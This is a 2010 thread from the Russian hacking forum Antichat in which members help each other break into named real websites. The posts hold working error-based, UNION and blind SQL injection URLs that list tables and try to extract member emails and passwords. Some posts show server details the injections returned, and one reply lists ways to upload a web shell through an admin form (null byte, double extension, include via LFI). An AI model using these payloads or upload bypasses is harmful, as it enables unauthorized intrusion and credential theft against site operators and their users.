HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.03.2010, 07:45
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

Цитата:
Сообщение от Pashkela  
Код:
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/0,1)a)*'

http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/1,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/1,1)a)*'

http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/2,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/2,1)a)*'
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+


говорит

SQL/DB Error -- [Unknown column 'Email' in 'field list']
удаляю Email потом грит что нету Password и тд.
тоесть не выводит инфо ???!!!
Нельзя ли через floor rand вывести инфо?
 
Ответить с цитированием

  #2  
Старый 13.03.2010, 08:36
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию

Цитата:
Сообщение от YuNi|[c  
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+


говорит

SQL/DB Error -- [Unknown column 'Email' in 'field list']
удаляю Email потом грит что нету Password и тд.
тоесть не выводит инфо ???!!!
Нельзя ли через floor rand вывести инфо?
Цитата:
concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns
Откуда должны быть в information_schema.columns пароли и емайлы?!
 
Ответить с цитированием

  #3  
Старый 13.03.2010, 14:18
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+


говорит

SQL/DB Error -- [Unknown column 'Email' in 'field list']
удаляю Email потом грит что нету Password и тд.
тоесть не выводит инфо ???!!!
Нельзя ли через floor rand вывести инфо?

Цитата:
Сообщение от ILYAtirtir  
Откуда должны быть в information_schema.columns пароли и емайлы?!
ну в information_schema.columns должны быть все имена колонок
 
Ответить с цитированием

  #4  
Старый 13.03.2010, 15:30
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию

Цитата:
Сообщение от YuNi|[c  
ну в information_schema.columns должны быть все имена колонок
Ну они там и есть,делается вот так:
Цитата:
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+
Дальше через лимит.Можно не перебирать а сделать вот так:
Цитата:
select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/and/**/column_name/**/LIKE/**/'%pass%'
Код:
SQL/DB Error -- [Duplicate entry 'Password1' for key 1]
 
Ответить с цитированием

  #5  
Старый 13.03.2010, 12:40
Train
Новичок
Регистрация: 09.01.2009
Сообщений: 21
С нами: 9124815

Репутация: 10
По умолчанию

Цитата:
Сообщение от Strilo4ka  
ругаемся на юнион + селект !!!

ps 5 ветка
Не удивительно, ведь SQL запросов походу два(или больше) т.к.
Код:
http://www.dom-ua.com/index.php?n=i&c=195&o=9408+order+by+52/*
еще что-то выдает, а
Код:
http://www.dom-ua.com/index.php?n=i&c=195&o=9408+order+by+53/*
Уже вообще пустой экран
 
Ответить с цитированием

  #6  
Старый 11.03.2010, 17:29
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
С нами: 8943448

Репутация: 127
По умолчанию

народ подскажите пжл, есть доступ в админку пытаюсь залить шелл через форму добовления банера, не разрешает. доступа к файлу ./htaccess нет
 
Ответить с цитированием

  #7  
Старый 11.03.2010, 17:51
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от Bramin  
народ подскажите пжл, есть доступ в админку пытаюсь залить шелл через форму добовления банера, не разрешает. доступа к файлу ./htaccess нет

способов масса, большинство описаны на форуме.

обрезать нульбайтом, двойное расширение, загрузка файла как есть, с последующим инклюдом его (если LFI на сайте или серве) ну и некоторые другие способы
 
Ответить с цитированием

  #8  
Старый 11.03.2010, 17:40
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию

Цитата:
http://www.nwec.ru/index.php?issue_id=57
Мучаюсь,мучаюсь, решил спросить, можно ли что сделать с этим сайтиком, id повсюду, фильтрация ничего не дает сделать..( Помогите.
Вот смотри:
Код:
http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+--+
 
Ответить с цитированием

  #9  
Старый 11.03.2010, 18:01
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию

Цитата:
Да,вывод видел,это слепая,да?Так как узнать уязвимое поле?(
Я в уязвимостях не очень шарю. Просто в этом случае смог подобрать количество полей.

Я другого не могу понять (вчера спрашивал, но здесь не могу все-равно). Почему не выводится инфа когда ввожу типа USER()? Пробовал так:
Код:
http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,USER(),6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1+--+
Что не так? И как сделать чтобы выводилось?
 
Ответить с цитированием

  #10  
Старый 11.03.2010, 18:06
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от CyberHunter  
Я в уязвимостях не очень шарю. Просто в этом случае смог подобрать количество полей.

Я другого не могу понять (вчера спрашивал, но здесь не могу все-равно). Почему не выводится инфа когда ввожу типа USER()? Пробовал так:
Код:
http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,USER(),6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1+--+
Что не так? И как сделать чтобы выводилось?
а с чего ты взял, что поле №5 принтабельное? По мне там просто слепая инъекция, совсем слепая:
Код:
http://www.nwec.ru/index.php?issue_id=57+and+substring(version(),1,1)=5

@@basedir: /usr/
@@tmpdir: /tmp/
@@datadir: /data/
version(): 5.0.77-log
database(): db_cevzap_1
@@version_compile_os: unknown-linux-gnu
хотя может и не так)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.